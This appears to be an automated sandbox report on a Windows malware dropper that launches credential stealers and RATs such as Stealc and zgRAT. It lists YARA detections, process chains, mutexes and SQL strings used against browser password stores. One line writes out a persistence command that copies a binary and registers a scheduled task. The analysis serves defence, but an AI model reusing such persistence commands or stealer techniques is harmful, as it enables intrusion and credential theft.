Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 009E4610 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C8994D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00407D20 appears 55 times

Source: Set-up[1].exe.7.dr	Static PE information: Number of sections : 18 > 10
Source: Set-up.exe.7.dr	Static PE information: Number of sections : 18 > 10
Source: Setup[1].exe.7.dr	Static PE information: Number of sections : 18 > 10
Source: Setup.exe.7.dr	Static PE information: Number of sections : 18 > 10

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 15.0.CZjRdKVnFB.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 28.0.build.exe.be0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.2.RegAsm.exe.482060.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.2.RegAsm.exe.482060.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001B.00000002.2629593096.00000000019EE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000026.00000002.2741849843.000000000160A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\build[1].exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: crypted[1].exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypted.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda[1].exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9972219856948229
Source: file.exe	Static PE information: Section: afdpsowp ZLIB complexity 0.9943810096153847
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9972219856948229
Source: axplong.exe.0.dr	Static PE information: Section: afdpsowp ZLIB complexity 0.9943810096153847

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@65/87@16/14

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 22_2_6C8B7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

22_2_6C8B7030

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 22_2_009F90A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

22_2_009F90A0

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\crypted[1].exe

Jump to behavior

Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3784:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: Yara match	File source: 25.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000000.2249923004.0000000000401000.00000020.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2259797317.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.22.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: stealc_default2.exe, 00000016.00000002.2281492977.000000001B3CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2301650261.000000006CA8F000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000016.00000002.2301034948.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2559340957.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2506856029.000000001B02F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2600809809.000000006C1EF000.00000002.00000001.01000000.00000019.sdmp, nss3[1].dll.25.dr, nss3[1].dll.22.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.22.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: stealc_default2.exe, 00000016.00000002.2281492977.000000001B3CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2301650261.000000006CA8F000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000016.00000002.2301034948.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2559340957.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2506856029.000000001B02F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2600809809.000000006C1EF000.00000002.00000001.01000000.00000019.sdmp, nss3[1].dll.25.dr, nss3[1].dll.22.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: svchost015.exe, 00000019.00000002.2456504727.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT name, value FROM autofillt;<
Source: stealc_default2.exe, 00000016.00000002.2281492977.000000001B3CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2301650261.000000006CA8F000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000016.00000002.2301034948.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2559340957.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2506856029.000000001B02F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2600809809.000000006C1EF000.00000002.00000001.01000000.00000019.sdmp, nss3[1].dll.25.dr, nss3[1].dll.22.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: stealc_default2.exe, 00000016.00000002.2281492977.000000001B3CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2301650261.000000006CA8F000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000016.00000002.2301034948.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2559340957.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2506856029.000000001B02F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2600809809.000000006C1EF000.00000002.00000001.01000000.00000019.sdmp, nss3[1].dll.25.dr, nss3[1].dll.22.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.22.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.22.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.22.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.22.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.22.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: stealc_default2.exe, stealc_default2.exe, 00000016.00000002.2281492977.000000001B3CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2301650261.000000006CA8F000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000016.00000002.2301034948.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2559340957.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2506856029.000000001B02F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2600809809.000000006C1EF000.00000002.00000001.01000000.00000019.sdmp, nss3[1].dll.25.dr, nss3[1].dll.22.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: stealc_default2.exe, 00000016.00000002.2281492977.000000001B3CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2301034948.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2559340957.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2506856029.000000001B02F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: stealc_default2.exe, 00000016.00000002.2281492977.000000001B3CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2301650261.000000006CA8F000.00000002.00000001.01000000.00000019.sdmp, stealc_default2.exe, 00000016.00000002.2301034948.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2559340957.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2506856029.000000001B02F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2600809809.000000006C1EF000.00000002.00000001.01000000.00000019.sdmp, nss3[1].dll.25.dr, nss3[1].dll.22.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.22.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, rHCHrI9F0v.exe, 00000011.00000002.2154611866.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000003.2128189491.0000000021499000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000003.2145481918.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000003.2144908622.000000002148D000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000003.2123594711.0000000000D3F000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2320706297.00000000210E9000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000019.00000003.2334626528.0000000021107000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2462346817.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 0000001A.00000003.2462346817.0000000002ED1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 00000016.00000002.2281492977.000000001B3CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2301034948.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2559340957.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2506856029.000000001B02F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.22.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: stealc_default2.exe, 00000016.00000002.2281492977.000000001B3CF000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000016.00000002.2301034948.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2559340957.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, svchost015.exe, 00000019.00000002.2506856029.000000001B02F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.22.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe "C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe"
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe "C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe"
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe "C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe "C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\1.exe "C:\Users\user\AppData\Local\Temp\1000191001\1.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe "C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\1000238002\Amadeus.exe "C:\Users\user\1000238002\Amadeus.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000241001\build.exe "C:\Users\user\AppData\Local\Temp\1000241001\build.exe"
Source: C:\Users\user\AppData\Local\Temp\1000241001\build.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe"
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\user\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F
Source: unknown	Process created: C:\Users\user\Pictures\Lighter Tech\runtime.exe "C:\Users\user\Pictures\Lighter Tech\runtime.exe"
Source: C:\Users\user\1000238002\Amadeus.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: unknown	Process created: C:\Users\user\1000238002\Amadeus.exe "C:\Users\user\1000238002\Amadeus.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe "C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe"
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Users\user\Pictures\Lighter Tech\runtime.exe "C:\Users\user\Pictures\Lighter Tech\runtime.exe"
Source: C:\Users\user\1000238002\Amadeus.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe "C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe "C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe "C:\Users\user\AppData\Local\Temp\1000129001\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000191001\1.exe "C:\Users\user\AppData\Local\Temp\1000191001\1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe "C:\Users\user\AppData\Local\Temp\1000228001\Setup.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\1000238002\Amadeus.exe "C:\Users\user\1000238002\Amadeus.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000241001\build.exe "C:\Users\user\AppData\Local\Temp\1000241001\build.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe "C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe "C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe"
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process created: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\1000191001\1.exe	Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
Source: C:\Users\user\1000238002\Amadeus.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
Source: C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\user\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe "C:\Users\user\AppData\Local\Temp\1000283001\channel3.exe"
